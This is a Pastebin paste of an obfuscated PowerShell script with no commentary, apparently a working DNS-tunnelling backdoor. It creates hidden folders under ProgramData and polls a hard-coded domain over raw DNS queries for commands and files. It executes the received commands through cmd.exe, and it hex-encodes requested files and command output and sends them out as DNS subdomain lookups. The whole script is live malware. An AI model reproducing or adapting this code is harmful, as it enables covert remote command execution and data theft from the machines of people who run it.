SHARE
TWEET

8c4fa86dcc2fd00933b70cbf239f0636

a guest Aug 27th, 2018 271 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.                                                                                                                                                          
  2. $MMC = "withyourface.com";
  3. $NNC = "C:\ProgramData\WindowsAppPool";
  4. if (-not (Test-Path $NNC)) { md $NNC; }
  5. $OOC = $NNC + "\quid";
  6. $PPC = $NNC + "\lock";
  7. if (!(Test-Path $PPC)){sc -Path $PPC -Value $pid;}
  8. else
  9. {
  10.    $QQC = (NEW-TIMESPAN -Start ((Get-ChildItem $PPC).CreationTime) -End (Get-Date)).Minutes
  11.   if ($QQC -gt 10)
  12.     {
  13.  stop-process -id (gc $PPC);
  14.     ri -Path $PPC;
  15.    }
  16.  return;
  17. }
  18. $RRC = get-content $OOC;
  19. $SSC = Get-Random -InputObject (10 .. 99);
  20. if ($RRC.length -ne 10) { $RRC = $SSC.ToString() + [guid]::NewGuid().toString().replace('-', '').substring(0, 8); $RRC | sc $OOC }
  21. gi $OOC -Force | %{ $_.Attributes = "Hidden" }
  22. ${global:$TTC} = 0;
  23.  
  24. function UUC ($VVC, $WWC, $XXC, $YYC, $ZZC, $AAD)
  25. {
  26.    $BBD = -join ((48 .. 57)+(65 .. 70) | Get-Random  -Count (%{ Get-Random -InputObject (1 .. 7) }) | %{ [char]$_ });
  27.    $CCD = Get-Random -InputObject (0 .. 9) -Count 2;
  28.    $DDD = $RRC.Insert(($CCD[1]), $WWC).Insert($CCD[0], $VVC);
  29.  if ($ZZC -eq "s")
  30.    { return "$($DDD)$($AAD)$($BBD)C$($CCD[0])$($CCD[1])T.$XXC.$YYC.$MMC"; }
  31.   else
  32.  { return "$($DDD)$($AAD)$($BBD)C$($CCD[0])$($CCD[1])T.$($MMC)";}
  33. }
  34. function EED()
  35. {
  36.   $FFD = $null;
  37.  try
  38.    {
  39.  $FFD = ((Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $env:computername -EA Stop | ? { $_.IPEnabled }).DNSServerSearchOrder)[0] | Out-String
  40.     }
  41.  catch [exception] {
  42.    #Write-Host $_.Message
  43.   }
  44.  if (!$FFD)
  45.   {
  46.  try
  47.    {
  48.  $ns = nslookup.exe 8.8.8.8;
  49.   $FFD = ($ns[1] -split ':')[1].Trim();
  50.  }
  51.  catch [exception] {
  52.    #Write-Host $_.Message
  53.   }
  54.  }
  55.  return $FFD
  56. }
  57. function GGD ($HHD)
  58. {
  59.   $ip = EED
  60.    $ars = [system.net.IPAddress]::Parse([System.Net.Dns]::GetHostAddresses($MMC));
  61.    $end = New-Object System.Net.IPEndPoint $ars, 53
  62.   $s = New-Object System.Net.Sockets.UdpClient
  63.   $s.Client.ReceiveTimeout = $s.Client.SendTimeout = 15000
  64.     $s.Connect($end)
  65.   $pre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)
  66.   if (!$HHD.StartsWith('.')) { $HHD = "." + $HHD; }
  67.     if (!$HHD.EndsWith('.')) { $HHD = $HHD + "."; }
  68.   $mb = [System.Text.Encoding]::ASCII.GetBytes($HHD)
  69.  $p = $HHD.Split('.')
  70.   $pi = 1
  71.  for ($i = 0; $i -lt $mb.length; $i++) { if ($mb[$i] -eq 0x2e) { $mb[$i] = $p[$pi].Length; $pi++ } }
  72.    $pre += $mb
  73.     $pre += (0x00, 0x10, 0x00, 0x01)
  74.     $buf = $pre
  75.     $Sent = $s.Send($buf, $buf.Length)
  76.    $rb = $s.Receive([ref]$end)
  77.   $r = [byte[]]( ,0x0 * ($rb.length - ($mb.length + 29)))
  78.  [System.Buffer]::BlockCopy($rb, $mb.length + 29, $r, 0, ($rb.length - ($mb.length + 29)))
  79.   return $r
  80. }
  81. function IID ($HHD)
  82. {
  83.     $ip = EED
  84.    $ars = [system.net.IPAddress]::Parse([System.Net.Dns]::GetHostAddresses($MMC));
  85.  $end = New-Object System.Net.IPEndPoint $ars, 53
  86.  $s = New-Object System.Net.Sockets.UdpClient
  87.     $s.Client.ReceiveTimeout = $s.Client.SendTimeout = 15000
  88.    $s.Connect($end)
  89.   $pre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)
  90.  if (!$HHD.StartsWith('.')) { $HHD = "." + $HHD; }
  91.    if (!$HHD.EndsWith('.')) { $HHD = $HHD + "."; }
  92.    $mb = [System.Text.Encoding]::ASCII.GetBytes($HHD)
  93.  $p = $HHD.Split('.')
  94.    $pi = 1
  95.  for ($i = 0; $i -lt $mb.length; $i++) { if ($mb[$i] -eq 0x2e) { $mb[$i] = $p[$pi].Length; $pi++ } }
  96.    $pre += $mb
  97.    $pre += (0x00, 0x01, 0x00, 0x01)
  98.     $buf = $pre
  99.    $Sent = $s.Send($buf, $buf.Length)
  100.     $rb = $s.Receive([ref]$end)
  101.  $r = [byte[]]( ,0x0 * ($rb.length - ($mb.length + 28)))
  102.   [System.Buffer]::BlockCopy($rb, $mb.length + 28, $r, 0, ($rb.length - ($mb.length + 28)))
  103.   return $r
  104. }
  105. function JJD
  106. {
  107.     $KKD = $false;
  108.     $LLD = 0;
  109.    $MMD = ${global:$NND} + "\";
  110.     $OOD = @();
  111.  $PPD = "000";
  112.    $QQD = "0";
  113.   ${global:$RRD} = $true;
  114.    ${global:$SSD} = 0;
  115.    ${global:$$TTD} = 5;
  116.  
  117.   While (${global:$RRD})
  118.     {
  119.  Start-Sleep -m 50;
  120.  if (${global:$SSD} -gt ${global:$$TTD}) { break }
  121.  if ($LLD -eq [int]$PPD) { ${global:$SSD}++ }
  122.   if ($LLD -lt 10) { $PPD = "00$($LLD)"; }
  123.     elseif ($LLD -lt 100) { $PPD = "0$($LLD)"; }
  124.    else { $PPD = "$($LLD)"; }
  125.   $UUD = UUC $PPD $QQD "" "" "r"
  126.    try
  127.    {
  128.  Write-Host $UUD;
  129.  $VVD = [System.Net.Dns]::GetHostAddresses($UUD);
  130.   Write-Host $VVD;
  131.      }
  132.  catch [Exception]
  133.   {
  134.    echo $_.Exception.GetType().FullName, $_.Exception.Message; Write-Host "excepton occured!"; ${global:$SSD}++; continue;
  135.    }
  136.  
  137.   if ($VVD -eq $null)
  138.    {
  139.  ${global:$SSD} = ${global:$SSD} + 1;
  140.   continue;
  141.  }
  142.  $WWD = $VVD[0].IPAddressToString.Split('.');
  143.   Write-Host "$($LLD):$($WWD[3])`tsaveing_mode: $($KKD)`t   $($WWD[0]) $($WWD[1]) $($WWD[2])"
  144.   if (($WWD[0] -eq 1) -and ($WWD[1] -eq 2) -and ($WWD[2] -eq 3))
  145.     {
  146.  $KKD = $false;
  147.     $QQD = "0";
  148.    $len = $OOD.Length
  149.      if ($OOD[$len - 1] -eq 0 -and $OOD[$len - 2] -eq 0)
  150.  {
  151.  $XXD = $OOD[0 .. ($len - 3)];
  152.     }
  153.    elseif ($OOD[$len - 1] -eq 0)
  154.   {
  155.  $XXD = $OOD[0 .. ($len - 2)];
  156.    }
  157.  else
  158.    {
  159.  
  160.     $XXD = $OOD;
  161.   }
  162.  [System.IO.File]::WriteAllBytes($MMD, $XXD);
  163.     $OOD = @();
  164.  $XXD = @();
  165.  $LLD = 0;
  166.    ${global:$RRD} = $false;
  167.     }
  168.  
  169.   if ($KKD)
  170.    {
  171.  if ($LLD -gt 250) { $LLD = 0; }
  172.    if ($LLD -eq $WWD[3])
  173.   {
  174.  $OOD += $WWD[0];
  175.   $OOD += $WWD[1];
  176.     $OOD += $WWD[2];
  177.     $LLD = $LLD + 3;
  178.    }
  179.  }
  180.  
  181.   if (($WWD[0] -eq 24) -and ($WWD[1] -eq 125))
  182.  {
  183.    $MMD += "rcvd" + $WWD[2] + "" + $WWD[3];
  184.     $KKD = $true;
  185.  $QQD = "1";
  186.  $LLD = 0;
  187.    }
  188.  
  189.   if (($WWD[0] -eq 11) -and ($WWD[1] -eq 24) -and ($WWD[2] -eq 237) -and ($WWD[3] -eq 110)) # kill this process
  190.  {
  191.  ${global:$RRD} = $false;
  192.     ${global:$SSD} = ${global:$SSD} + 1;
  193.   }
  194.  }
  195.  Start-Sleep -s 1;
  196. }
  197. function YYD
  198. {
  199.   $byts = @(); $ct = 0; $fb = @(); $rn = "000"; $ZZD = "W"; $run = $true; $AAE = ${global:$NND} + "\";
  200.   $BBE = 0;
  201.    While ($run)
  202.     {
  203.  Start-Sleep -m 50;
  204.  if ($BBE -gt 5){ $run = $false; }
  205.  if ($ct -lt 10){$rn = "000$($ct)";}
  206.    elseif ($ct -lt 100){$rn = "00$($ct)";}
  207.    elseif ($ct -lt 1000){$rn = "0$($ct)";}
  208.     else{$rn = "$($ct)";}
  209.  try
  210.  
  211.   {
  212.  $CCE = UUC "000" $ZZD "" "" "r" $rn
  213.   $tmp = GGD($CCE);
  214.  $res = [System.Text.Encoding]::ASCII.GetString($tmp);
  215.  }
  216.  catch [exception] { Write-Host $_; $BBE++; ${global:$TTC}++; continue; }
  217.  if ([string]::IsNullOrEmpty($res)) { $BBE++; ${global:$TTC}++; continue;}
  218.  $rs = $res.Split('>');
  219.     $data = "";
  220.  For ($i = 0; $i -le $rs[1].Length; $i++) { if ($rs[1][$i] -lt 125 -and $rs[1][$i] -gt 41) { $data += $rs[1][$i]; } }
  221.  if ($rs[0][0] -eq "N")
  222.    {
  223.    $ZZD = "W";
  224.  $BBE++;
  225.  continue;
  226.    }
  227.  if ($rs[0] -eq "S000s")
  228.  {
  229.  $BBE = 0;
  230.     $ZZD = "D";
  231.  $AAE += ("rcvd"+$data);
  232.     $ct = 0;
  233.     continue;
  234.  }
  235.  if ($rs[0][0] -eq 'S' -and -not ($fb -contains $rs[0]))
  236.    {
  237.   $ZZD = "D";
  238.  if ($rs[0].EndsWith($rn))
  239.  {
  240.  try
  241.     {
  242.   $tmp = $data.Replace('-', '+').Replace('_', '/');
  243.    $byts += [System.Convert]::FromBase64String($tmp);
  244.     $ct++;
  245.   $fb += $rs[0];
  246.   }
  247.  catch
  248.  {
  249.  Write-Host "Exception in receiver_"+$_;
  250.   }
  251.  }
  252.  }
  253.    if ($rs[0].StartsWith("E"))
  254.  {
  255.  [System.IO.File]::WriteAllBytes($AAE, $byts);
  256.    break;
  257.     }
  258.  if ($rs[0].StartsWith("C"))
  259.  {
  260.  $ct = 0; $run = $false;
  261.   }
  262.  }
  263. }
  264. function DDE($EEE)
  265. {
  266.  $LLD = 0;
  267.    $FFE = @(gci -path (${global:$GGE}+"\proc*") | ? { !$_.PSIsContainer });
  268.    if ($FFE -ne $null)
  269.    {
  270.  
  271.   $HHE = $FFE[0].ToString().Substring($FFE[0].ToString().Length - 5)
  272.     $IIE = ${global:$GGE} + "\" + $HHE;
  273.     rni $FFE[0] $IIE -Force
  274.  $JJE = slaber $IIE;
  275.     if ([int]$JJE.Length -le 0) { rd -path $IIE;return; }
  276.   $KKE = 60;
  277.    $LLE = "*" * 54;
  278.     $LLE = Split-path $IIE -Leaf | % { $LLE.Insert(0, $_) } | % { $_.Insert(6, $JJE.Length) } | %{ $_[0 .. 26] -join "" };
  279.    $LLE = -join ($LLE | % { resolver $_ })
  280.     $MME = "COCTab" + $LLE;
  281.    $JJE = $MME + $JJE;
  282.  $NNE = "000";
  283.     $QQD = "2";
  284.  $OOE = 0;
  285.  
  286.   $PPE = $true;
  287.  ${global:$RRD} = $true;
  288.   $QQE = $true;
  289.  ${global:$SSD} = 0;
  290.     ${global:$TTD} = 5;
  291.    
  292.   While (${global:$RRD})
  293.  {
  294.  Start-Sleep -m 10;
  295.     if (${global:$SSD} -gt ${global:$TTD})
  296.  {
  297.  $RRE = ${global:$GGE} + "\proc" + $HHE;
  298.      rni $IIE $RRE -Force;
  299.    break;
  300.     }
  301.  
  302.    if ($LLD -lt 10) { $NNE = "00$($LLD)"; }
  303.   elseif ($LLD -lt 100) { $NNE = "0$($LLD)"; }
  304.   else { $NNE = "$($LLD)"; }
  305.    
  306.   if ($LLD -eq 250)
  307.     {
  308.  if ($PPE)
  309.    {
  310.  $OOE += 250;
  311.     }
  312.  $LLD = 0; $PPE = $false;
  313.     }
  314.  if ($LLD -eq 200) { $PPE = $true; }
  315.  
  316.   if ($JJE.Length -gt $KKE)
  317.  {
  318.  if (($JJE.Length - $KKE * ($LLD + $OOE)) -ge $KKE)
  319.     {
  320.  $SSE = $JJE.Substring($KKE * ($LLD + $OOE), $KKE);
  321.  }
  322.  elseif (($JJE.Length - $KKE * ($LLD + $OOE)) -gt 0)
  323.     {
  324. $SSE = $JJE.Substring($KKE * ($LLD + $OOE), ($JJE.Length - $KKE * ($LLD + $OOE)));
  325.  }
  326.  else
  327.    {
  328.  $SSE = "COCTabCOCT";
  329.     ${global:$RRD} = $false;
  330.    rd -path $IIE -Force;
  331.    }
  332.  }
  333.  else
  334.   {
  335.  $SSE = $JJE;
  336.    }
  337.  $TTE = (Split-path $IIE -Leaf) + "*" | % { resolver $_ };
  338.   $UUD = UUC $NNE $QQD $SSE $TTE "s" "0000"
  339.    try
  340.    {
  341.  if ($EEE -lt 3 -and -not ($UUE))
  342.    {
  343.    $VVD = IID($UUD);
  344.    }
  345.  else
  346.    {
  347.  $VVD = [System.Net.Dns]::GetHostAddresses($UUD);
  348.   $VVD = $VVD.IPAddressToString.Split('.')
  349.     }
  350.  Write-Host $VVD;
  351.    }
  352.   catch [exception] { Write-Host "excepton occured!"+$_; ${global:$SSD}++; continue; }
  353.  
  354.   if ($VVD -eq $null) { $QQE = $false; ${global:$SSD}++; continue }
  355.    if (($VVD[0] -eq $RRC.Substring(0,2)) -and ($VVD[1] -eq 2) -and ($VVD[2] -eq 3))
  356.     {
  357.  $QQE = $false;
  358.  $LLD = [int]$VVD[3];
  359.   }
  360.  
  361.    
  362.   if (($VVD[0] -eq 253) -and ($VVD[1] -eq 25) -and ($VVD[2] -eq 42) -and ($VVD[3] -eq 87)) # kill this process
  363.    {
  364.  $QQE = $false;
  365.     $OOE = 0
  366.     ${global:$RRD} = $false;
  367.     ${global:$SSD} = ${global:$SSD} + 3;
  368.   del $IIE;
  369.    }
  370.  
  371.   if ($QQE)
  372.    {
  373.  
  374.     ${global:$SSD}++;
  375.    }
  376.  }
  377.  }
  378. }
  379. function slaber ($VVE) {
  380.    $f = gc $VVE -Encoding Byte;
  381.   $e = resolver($f);
  382.     return $e;
  383. }
  384. function resolver ($WWE) {
  385.   $cnt = 0;
  386.    $p1 = "";
  387.    $p2 = "";
  388.     for ($i = 0; $i -lt $WWE.Length; $i++)
  389.     {
  390.  if ($cnt -eq 30)
  391.     {
  392.  $cnt = 0;
  393.    $res += ($p1 + $p2);
  394.     $p1 = ""; $p2 = "";
  395.     }
  396.  $tmp = [System.BitConverter]::ToString($WWE[$i]).Replace("-", "");
  397.   $p1 += $tmp[0];
  398.     $p2 += $tmp[1];
  399.    $cnt++;
  400.  }
  401.  $res += ($p1 + $p2);
  402.  return $res;
  403. }
  404. function XXE
  405. {
  406.    $FFE = @(gci -path (${global:$NND}+"\rcvd*") | ? { !$_.PSIsContainer });
  407.    if ($FFE -ne $null)
  408.    {
  409.  $IIE = $FFE[0].ToString().Replace("rcvd", "proc")
  410.  rni $FFE[0] $IIE -Force
  411.     $YYE = $IIE -replace "receivebox", "sendbox";
  412.   if ($IIE.EndsWith("0"))
  413.   {
  414.  $ZZE = gc $IIE | ? { $_.trim() -ne "" };
  415.  $ZZE = $ZZE | ? { $_.trim() -ne "" }
  416.    $AAF += ($ZZE + " 2>&1") | % {Try { $_ | cmd.exe | Out-String }Catch { $_ | Out-String }}
  417.    $AAF +"<>" | sc $YYE -Encoding UTF8
  418.  if (Test-path -path $IIE)
  419.     {
  420.  rd -path $IIE;
  421.    }
  422.  }
  423.  elseif ($IIE.EndsWith("1"))
  424.   {
  425.    $BBF = gc $IIE | ? { $_.trim() -ne "" } | %{ $_.Replace("`0", "").Trim() }
  426.    if (Test-path -path $BBF)
  427.    {
  428.  cpi -path $BBF -destination $YYE -Force;
  429.   }
  430.  else
  431.   {
  432.  "File not exist" | sc $YYE;
  433.    }
  434.  if (Test-path -path $IIE)
  435.    {
  436.  rd -path $IIE;
  437.   }
  438.  
  439.     }
  440.  else {
  441.  $CCF = $IIE -replace "receivebox", "done";
  442.   mi -path $IIE -destination $CCF -Force;
  443.     if (Test-path -path $CCF)
  444.    {
  445.  ("200<>" + $CCF) | sc $YYE;
  446.   rd -path $IIE;
  447.   }
  448.  }
  449.  try
  450.    {
  451.  rd -path $IIE;
  452.   }catch{}
  453.    }
  454. }
  455. ${global:$DDF} = $NNC + "\" + $RRC;
  456. ${global:$EEF} = $NNC + "\files";
  457. ${global:$NND} = ${global:$DDF} + "\receivebox";
  458. ${global:$GGE} = ${global:$DDF} + "\sendbox";
  459. ${global:$FFF} = ${global:$DDF} + "\done";
  460.  
  461. if (-not (Test-Path ${global:$EEF})) { md ${global:$EEF}; }
  462. if (-not (Test-Path ${global:$DDF}) -or -not (Test-Path ${global:$GGE}))
  463. {
  464.     md ${global:$DDF};
  465.     md ${global:$GGE};
  466.  md ${global:$NND};
  467.  md ${global:$FFF};
  468. }
  469. $GGF = UUC "000" "M" "" "" "r" $rn
  470. $HHF = [System.Net.Dns]::GetHostAddresses($GGF);
  471. $UUE = $false;
  472. if ($HHF -eq "99.250.250.199")
  473. {
  474.    ${global:$TTC} = 0;
  475.    YYD;
  476.   if (${global:$TTC} -gt 3)
  477.   {
  478.  $UUE = $true;
  479.  
  480.     $IIF = UUC "000" "P" "" "" "r" $rn
  481.   [System.Net.Dns]::GetHostAddresses($IIF);
  482.     JJD;
  483.   }
  484. }
  485. else
  486. {
  487.  $UUE = $true;
  488.   JJD;
  489. }
  490. XXE;
  491. DDE(${global:$TTC});
  492. # remove lock file to next request
  493. ri -Path $PPC;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top